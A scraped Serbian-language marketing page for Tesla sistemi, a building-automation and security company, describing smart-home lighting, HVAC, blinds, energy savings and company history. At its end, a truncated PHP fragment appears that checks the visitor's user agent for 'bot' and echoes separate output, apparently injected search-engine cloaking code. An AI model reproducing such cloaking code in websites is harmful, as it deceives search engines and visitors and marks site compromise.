TESLA SISTEMI - VODEĆI SISTEM INTEGRATOR U SRBIJI

Naša ponuda obuhvata razvoj, projektovanje, montažu, puštanje u rad sistema automatizacije zgrada i održavanje istih sistema u garantnom, a po dogovoru i van garantnog roka.

Preduzeće Tesla sistemi se sastoji od više sektora među kojima je i sektor koji se bavi uvozom i prodajom opreme mnogobrojnih svetskih proizvođača.

Zaokruživši kompletnu celinu, od uvoza opreme, preko projektovanja do montaže i puštanja sistema u rad sa posedovanjem kompletne infrastrukture da se obave i najzahtevniji poslovi, korisniku pružamo maksimum za njegov uložen novac.

 

Elektronski gromobrani, gromobrani sa ranim startovanjem

Inteligentna kuća

Kućnu automatizaciju možemo opisati kao tehniku upravljanja tehnologijom u domu koja služi poboljšanju kvaliteta života. Glavne odlike inteligentne kuće su: visoki komfor, sigurnost, ušteda energije, inteligentno izvršavanje svakodnevnih zadataka u domaćinstvu i rasterećenje korisnika, uopšteno podizanje životnog ambijenta na udobniji i lepši nivo. Upravo je to razlog zašto je kućna automatizacija prestala biti luksuz i zašto je postala pametan alat za upravljanje.... 
Klasični gromobran

Pametna Kancelarija

U našim rešenjima naglašavamo optimalnu funkcionalnost i važnost integracija, a da pri tome ne zanemarujemo udobnost, racionalnost upotrebe energije i bezbednost... 

 

Kisobran, kuća, Zaštita opreme

Centralizacija

Inteligentna kuća će pratiti Vaše dnevne aktivnosti i maksimalno se prilagođavati Vama i ostalim ukućanima. Vaš komfor, sigurnost i celokupan životni ambijent bit će podići na novi, udobniji i lepši nivo. Inteligentna kuća će pravilnim raspolaganjem energetskim resursima ostvarivati značajne uštede...

 

Rasveta

Štedne halogene sijalice troše 30% manje energije nego obične sijalice. Uz to, trajanje takve sijalice je puno duže. Uz modul rasvete imate mogućnost regulacije intenziteta osvetljenja (tzv. dimovanje). Jednim klikom na telefonu stvaraju se različiti ambijenti u domu, što može dodatno uštedeti energiju, a rasveta se i dalje može paliti/gasiti na “klasičan” način, prekidačem...

Pametna klimatizacija

Aplikacije za kontrolu sistema HVAC uključuju proizvode, sisteme i usluge, a HVAC kontrolni sistemi stalno obezbeđuju optimalne uslove životne sredine u svakoj oblasti...

Energetska efikasnost

U prosečnom stanu se može uštedeti i do 30% novca na godišnjem nivou, koristeći Tesla sistem automatizacije i pridržavajući se osnovnih načela uštede energije. Naš sistem automatizacije štedi energiju i dodatno štiti okolinu...

 

Pametna zaštita

Odlika pametnog sistema automatizacije je i sprečavanje neželjenih situacija što doprinosi sigurnosti doma i bezbednosti ukućana.

Roletne

Upravljanje roletnama, tendama i zavesama utiče na energetsku efikasnost, jer može uštedeti od 30% do 50% energije na hlađenju i grejanju. Da bi se upravljalo, potrebno je da postoje odgovarajući motori..

NAŠI PARTNERI

JAVITE NAM SE

Mala firma?! Velika firma?! Projektantska kuća?! Instalaterska kuća?! Nije važno. Javite nam se. Zatražite rešenje Vašeg problema. Mi smo tu da Vam ponudimo rešenje. Bilo gde da se nalazite u Srbiji, rado ćemo Vas posetiti i u saradnji sa svojim partnerima rešiti Vaše zahteve.
Kontakt>

 

ISTORIJA TESLA SISTEMA

Tesla sistemi su osnovani 2006. godine. Od osnivanja do danas, imamo prosečni godišnji rast prometa od 20 - 30%. To je postalo pravilo poslovanja u prethodnih 12 godina.

 

 

Ono što nam je bitnije od svih ovih podataka, koji već pripadaju prošlom vremenu, jeste da smo kompanija sa velikim potencijalom i da možemo u budućnosti da ostvarimo još bolje rezultate. Ovo je činjenica koju stalno ističu naši korisnici, saradnici i konkurencija.

 

Nama je najvažnije da smo danas veći nego što smo bili juče i da imamo ogromnu količinu pozitivne energije koju ćemo upotrebiti da sutrašnji dan učinimo boljim od današnjeg.

 


NAŠA PREPORUKA

 

Tesla sistemi
Interfoni
Audio sistemi
Alarmni sistemi
Kontrola pristupa
Video nadzor
Gromobranski sistemi
Termovizija
Sirene
Automatizacija
Inženjer
Pelco
Energija
Tehnička-zaštita
Telekomunikacije

Tesla.rs
Led displeji
Solarni sistemi
Industrija
Energetika
Sistemi za vojsku
Merenja
Svetlost i rasveta
Protiv požarni sistemi
Vozila
Perimetar
Preventiva
Energetske-instalacije
Specijalne-instalacijeLOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo '